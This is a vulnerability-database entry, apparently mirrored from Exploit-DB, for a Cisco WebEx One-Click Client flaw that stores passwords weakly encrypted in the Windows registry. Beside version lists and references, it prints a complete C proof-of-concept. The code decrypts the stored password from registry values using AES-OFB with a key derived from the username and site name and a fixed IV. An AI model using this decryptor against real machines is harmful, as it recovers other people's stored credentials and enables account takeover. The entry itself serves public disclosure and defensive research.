Sign-up

ID

VAR-E-201307-0238


EDB ID

38668


TITLE

Cisco WebEx One-Click Client Password Encryption - Information Disclosure - Windows local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38668

DESCRIPTION

Cisco WebEx One-Click Client Password Encryption - Information Disclosure.. local exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 38668

AFFECTED PRODUCTS

vendor:ciscomodel:webex one-click client password encryptionscope: - version: -

Trust: 1.0

vendor:ciscomodel:webexscope:eqversion:27.10

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:26.49.32

Trust: 0.3

vendor:ciscomodel:webex t27 sp28scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 sp25 ep3scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 sp23scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 sp21 ep9scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 sp11 ep23scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 ld sp32 cp1scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 ld sp32scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 lc sp25 ep9scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 lc sp25 ep10scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 lb sp21 ep10scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 l sp11 ep26scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t27 fr20scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex t26 sp49 ep40scope: - version: -

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:3.26

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:28.4

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:28.1.0

Trust: 0.3

vendor:ciscomodel:webex 27lc sp22scope: - version: -

Trust: 0.3

vendor:ciscomodel:webex 27lb sp21 ep3scope: - version: -

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:27.32.2

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:27.32.10

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:27.25.11

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:27.00

Trust: 0.3

vendor:ciscomodel:webexscope:eqversion:26.00

Trust: 0.3

sources: BID: 61304 // EXPLOIT-DB: 38668

EXPLOIT

// source: https://www.securityfocus.com/bid/61304/info

Cisco WebEx One-Click Client is prone to an information disclosure vulnerability.

Successful exploits may allow an attacker to disclose sensitive information such as stored passwords; this may aid in further attacks.

/*
WebEx One-Click Registry Key Decryptor
brad.antoniewicz@foundstone.coma

compile with gcc -o webex-onedecrypt -lssl webex-onedecrypt.c

Thanks to https://code.google.com/p/tps-cripto-itba/source/browse/trunk/src/criptography
for making life easy

see comments below

*/

#include <openssl/aes.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

unsigned char *
aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv)
{
unsigned char * outbuf = calloc(1,length);
int num = 0;

unsigned char liv[16];

memcpy(liv,iv,16);

AES_KEY aeskey;

//memset(outbuf, 0, 8);

AES_set_encrypt_key(key, 256, &aeskey);

AES_ofb128_encrypt(text, outbuf, length, &aeskey, liv, &num);

return outbuf;
}

unsigned char *
aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv)
{
unsigned char * outbuf= calloc(1,length);
int num = 0;

unsigned char liv[16];

memcpy(liv,iv,16);

AES_KEY aeskey;

AES_set_encrypt_key(key, 256, &aeskey);

AES_ofb128_encrypt(enc, outbuf, length, &aeskey, liv, &num);

return outbuf;
}
void main() {
/*
This value is from
HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password
*/
unsigned char * regVal = "\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f";
/*
This value is from
HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen
*/
int regLength = 12;

/*
This value is a combination of these two registry keys:
HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName

Basicaly the username and the sitename padding to 32 characters, if the
two dont add up to 32 characters, its just repeated until it fits
*/
unsigned char key[32] = "braantonsiteaa.webex.com/siteaab";

/*
The IV is static, particularly complex value of 123456789abcdef....
*/
unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };

/*
These are just for testing, you'd probably not have the password :)
*/
unsigned char * password = "bradbradbrad";
int pwLength = strlen((char *)password);

unsigned char * enc = NULL;
unsigned char * enc2 = NULL;
int i = 0;


printf("Reg Key Value = ");
enc = aes_ofb_encrypt(password, pwLength, key, iv);
for(i=0;i<pwLength;i++) {
printf("%02x ", enc[i]);
}
printf("\n");

printf("Password = ");
enc2 = aes_ofb_decrypt(regVal, regLength, key, iv);
for(i=0;i<regLength;i++) {
printf("%c", enc2[i]);
}
printf("\n");

}

Trust: 1.0

sources: EXPLOIT-DB: 38668

EXPLOIT LANGUAGE

c

Trust: 0.6

sources: EXPLOIT-DB: 38668

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38668

TYPE

Information Disclosure

Trust: 1.0

sources: EXPLOIT-DB: 38668

CREDITS

Brad Antoniewicz

Trust: 0.6

sources: EXPLOIT-DB: 38668

EXTERNAL IDS

db:EXPLOIT-DBid:38668

Trust: 1.9

db:BIDid:61304

Trust: 1.9

db:EDBNETid:59737

Trust: 0.6

sources: BID: 61304 // EXPLOIT-DB: 38668 // EDBNET: 59737

REFERENCES

url:https://www.securityfocus.com/bid/61304/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/38668/

Trust: 0.6

url:http://blog.opensecurityresearch.com/2013/07/quick-reversing-webex-one-click.html

Trust: 0.3

url:https://www.exploit-db.com/exploits/38668

Trust: 0.3

url:http://www.cisco.com/web/products/quad/index.html

Trust: 0.3

url:https://github.com/opensecurityresearch/onedecrypt/

Trust: 0.3

sources: BID: 61304 // EXPLOIT-DB: 38668 // EDBNET: 59737

SOURCES

db:BIDid:61304
db:EXPLOIT-DBid:38668
db:EDBNETid:59737

LAST UPDATE DATE

2022-07-27T09:45:14.168000+00:00


SOURCES UPDATE DATE

db:BIDid:61304date:2013-07-09T00:00:00

SOURCES RELEASE DATE

db:BIDid:61304date:2013-07-09T00:00:00
db:EXPLOIT-DBid:38668date:2013-07-09T00:00:00
db:EDBNETid:59737date:2013-07-09T00:00:00